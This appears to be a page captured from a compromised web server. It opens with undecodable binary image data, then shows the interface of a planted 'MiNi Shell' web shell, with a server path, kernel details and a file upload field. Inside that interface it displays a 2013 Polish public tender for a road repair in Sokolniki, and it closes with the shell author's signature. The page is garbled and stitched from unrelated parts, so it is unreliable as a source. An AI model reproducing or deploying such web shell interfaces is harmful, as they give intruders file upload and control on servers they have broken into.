JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130708/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130708/136297-N-2013.html

<p class="kh_header"><b>Sokolniki: Wykonanie robót budowlanych drogowych - remont drogi gminnej nr 118206E Tadziów - Prusak - Borki, na odcinku Prusak - Borki, 1300 mbx3,5m=4.550,0 m2</b><br>
<b>Numer ogłoszenia: 136297 - 2013; data zamieszczenia: 08.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Sokolnikach , ul. Marsz. Józefa Piłsudskiego 1, 98-420 Sokolniki, woj. łódzkie, tel. 062 7845176, faks 062 7845194.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sokolniki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót budowlanych drogowych - remont drogi gminnej nr 118206E Tadziów - Prusak - Borki, na odcinku Prusak - Borki, 1300 mbx3,5m=4.550,0 m2.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.  Opis przedmiotu zamówienia : 
1) Wykonanie nawierzchni jezdnej na odcinku 1300 mb,
2) Oczyszczenie i skropienie nawierzchni emulsją asfaltową,
3) Wykonanie warstwy ścieralnej gr. 4 cm z betonu asfaltowego na dł.1300 mb 
i 3,50 m. 
        Szczegółowy opis przedmiotu zamówienia zawiera specyfikacja      
        technicznego wykonania i odbioru robót, oraz przedmiar robót będące załącznikami 
       do niniejszej Specyfikacji Istotnych Warunków Zamówienia  
    2.1.Zakres zamówienia publicznego obejmuje : 
        a) organizację terenu budowy,
        b) dostawę materiałów, sprzętu i narzędzi niezbędnych do wykonania robót budowlanych,
        c)  wykonanie robót budowlanych według specyfikacji  technicznej wykonania i odbioru robót
             załączonych do SIWZ.            
     2.2.Zamawiający zastrzega, że wszystkie wskazane materiały (wyroby) z podaniem producenta,
            marki, znaku towarowego w SIWZ należy rozumieć jako określenie wymaganych
            parametrów technicznych lub standardów jakościowych - jako przykładowe ze względu 
            na zasady ustawy prawo zamówień publicznych, a zwłaszcza art.29 do 31. Oznacza to, że 
            w przypadku wskazanych z nazwy materiałów i wyrobów Zamawiający dopuszcza 
            zastosowanie równoważnych materiałów (wyrobów), nie gorszej jakości niż opisane
            w dokumentacji przetargowej. Ciężar udowodnienia, że materiał (wyrób) jest równoważny
            w stosunku do wymogu określonego przez Zamawiającego spoczywa na składającym ofertę.
            W takim wypadku Wykonawca musi przedłożyć odpowiednie dokumenty opisujące
            parametry techniczne, wymagane prawem certyfikaty i inne dokumenty dopuszczające dane
            materiały (wyroby) do użytkowania, oraz pozwalające jednoznacznie stwierdzić, że są one
             rzeczywiście równoważne..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.21-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 06.09.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium w wysokości :4.162,00 zł , słownie : cztery tysiące
    sto sześćdziesiąt dwa złote 08/100
2.Wadium może być wnoszone w jednej lub kilku następujących formach : 
    1) pieniądzu,
    2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej
        z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
    3) gwarancjach bankowych,
    4) gwarancjach ubezpieczeniowych,
    5) poręczeniach udzielonych przed podmioty, o których mowa w art.6b ust.5 pkt.2 ustawy 
        z dnia 9 listopada 2000 r, o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości
        (Dz. U. z 2007 r, Nr 42 poz.275, ze zmianami).
3.Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek  bankowy Rejonowego
    Banku Spółdzielczego w Lututowie, oddział w Sokolnikach,
    nr konta : 42 9256 0004 4200 0114 2000 0080 z adnotacją : wadium przetargowe -
    roboty budowlane - remont drogi gminnej
4.Wadium wniesione w pieniądzu Zamawiający przechowuje się na rachunku bankowym.                                                       
5.Wadium wniesione w pieniądzu należy złożyć  przed terminem składania
    ofert. Przy czym za termin wniesienia wadium w formie pieniężnej przyjmuje się termin uznania
     na rachunku bankowym Zamawiającego. 
6.Wadium wniesione w pieniądzu, zostanie zwrócone wraz z odsetkami wynikającymi z umowy
   rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia 
   rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy 
   wskazany przez Wykonawcę.
7.Wadium wniesione w formie innej niż pieniądz należy złożyć w formie oryginału, razem z ofertą
    w osobnej kopercie. 
8.Polisa, poręczenie, gwarancja lub inny dokument stanowiący formę wadium winno zawierać 
   stwierdzenie, że na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty kwoty 
   wadium zgodnie z warunkami specyfikacji istotnych warunków zamówienia, następuje jego  
   bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń ze strony gwaranta/poręczyciela. 

9.Oferta niezabezpieczona wadium w jednej lub kilku z podanych wyżej form zostanie wykluczona 
   bez rozpatrywania.
10.Zamawiający zwróci niezwłocznie wadium wszystkim Wykonawcom po wyborze
     najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego
     oferta zostanie wybrana jako najkorzystniejsza.
11.Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, Zamawiający zwróci 
     wadium niezwłocznie po zawarciu umowy.
12.Zamawiający zwróci niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed 
     upływem terminu składania ofert.
13.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została 
     wybrana odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach 
     określonych w ofercie, lub zawarcie umowy w sprawie zamówienia publicznego stało się
      niemożliwe z przyczyn leżących po stronie Wykonawcy.
14.W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte 
      w art.45 i art.46 ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza żadnego warunku udziału</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz co najmniej 3 robót budowlanych, o wartości każdej roboty nie mniejszej  
                 niż 138.000,00 zł (brutto), wykonanych w okresie pięciu lat przed dniem wszczęcia 
                 postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia 
                działalności jest krótszy - w tym okresie, odpowiadającym swoim rodzajem i wartością 
                 robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości
                 oraz daty i miejsca wykonywania oraz załączeniem dokumentów potwierdzających, że
                 roboty te zostały wykonane należycie.
             b) potwierdzeniem wykazu wykonanych robót budowlanych mogą być :        
                  - referencje, 
                  - protokoły odbioru,
                  - lub inne, z których wynikałaby rzetelność wykonanych robót.
               Przez roboty odpowiadające swoim rodzajem i wartością rozumie się - roboty tożsame
               z przedmiotem niniejszego zamówienia publicznego na roboty budowlane.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza żadnego warunku udziału</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia, niezależnie od tego, czy są
         one zatrudnione bezpośrednio przez Wykonawcę, w szczególności odpowiedzialnych za
         świadczenie usług,kontrolę jakości lub kierowania robotami budowlanymi, wraz z
         informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia
         niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności.
         Wykonawca winien dysponować co najmniej :
          - jedna osobą posiadającą aktualne uprawnienia budowlane o specjalności drogowej,
            osoby o których mowa wyżej mogą wykonywać samodzielnie funkcje techniczne w
         budownictwie i spełniają łącznie wszystkie poniżej warunki : 
         - są wpisane w drodze decyzji do centralnego rejestru osób posiadających uprawnienia 
           budowlane i 
         - są wpisane na listę członków właściwej izby samorządu zawodowego. 
Oświadczenie, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają
         wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
         Kierownik budowy - branża budowlana - uprawnienia budowlane bez ograniczeń do
         kierowania robotami budowlanymi w specjalności drogowej (lub odpowiadające im
         równoważne uprawnienia budowlane,
         które zostały wydane na podstawie wcześniej obowiązujących przepisów); doświadczenie w 
         pełnieniu funkcji kierownika budowy lub robót przy budowie, remoncie lub przebudowie
         drogi publicznej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza żadnego warunku udziału</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza dokonania zmiany umowy zgodnie z art.144 ustawy, w tym także w zakresie postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia następujących warunków. 
1.Zamawiający dopuszcza zmianę postanowień zawartej umowy w następujących przypadkach : 
     1) w uzasadnionych przypadkach, gdy zajdzie konieczność wprowadzenia zmian wynikających
         z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy,
     2) w przypadku, gdy zmiany postanowień zawartej umowy będą korzystne dla Zamawiającego, 
         a zmiany wynikły w trakcie realizacji zamówienia,
     3) aktualizacji rozwiązań z uwagi na postęp technologiczny,
     4) zmiany w sposobie dokonywania płatności,
     5) zmiany danych Wykonawcy, np. zmiana adresu, nr REGON, osób kontaktowych itp.,
     6) zmiany koordynatora, lub osób do kontaktów.
2.Termin realizacji przedmiotu umowy, może ulec przedłużeniu w przypadku zajścia okoliczności 
   uniemożliwiających terminowe zrealizowanie przedmiotu zamówienia o czas trwania przeszkody,
   chyba, że przeszkoda leży po stronie Wykonawcy.
3.Zakres rzeczowy zamówienia określony umową może zostać ograniczony przez Zamawiającego,
   bez skutków finansowych i prawnych dla Zamawiającego, w przypadku gdy wykonanie
   przedmiotu zamówienia  w pełnym zakresie nie leży w interesie publicznym, czego nie można
   było wcześniej przewidzieć.
4.Warunki dokonania zmian : 
   1) zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą obu stron, wyrażoną
       na piśmie, pod rygorem nieważności,
   2) strona występująca o zmianę postanowień zawartej umowy : 
opisze zaistniałą okoliczność,
uzasadni, udokumentuje zaistnienie powyżej okoliczności,
obliczy koszty zmiany, jeśli zmiana będzie miała wpływ na wynagrodzenie
Wykonawcy,
opisze wpływ zmiany na termin wykonania umowy.
    3) wniosek o zmianę postanowień zawartej umowy musi być wyrażony na piśmie. 





 5. W razie wystąpienia siły wyższej, czyli losowego zdarzenia zewnętrznego, którego skutków
      nie da się przewidzieć,np. huragan,powódź, ulewne deszcze,silne mrozy a także w razie
      konieczności podjęcia działań zmierzających do ograniczenia skutków wystąpienia siły
      wyższej,
 6. Warunkami atmosferycznymi uniemożliwiającymi prowadzenie robót budowlanych, 
      np. gwałtowne opady deszczu,silne wiatry, silne mrozy, w razie zmiany powszechnie
      obowiązujących przepisów prawa w zakresie mającym wpływ na termin wykonania
      przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sokolniki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Sokolnikach, ul. Marsząłka Józefa Piłsudskiego 1
98 - 420 Sokolniki, pokój nr 10.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.07.2013 godzina 10:00, miejsce: Urząd Gminy Sokolniki, ul. Marszałka Józefa Piłsudskiego 1,
98 - 420 Sokolniki, pokój nr 21.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com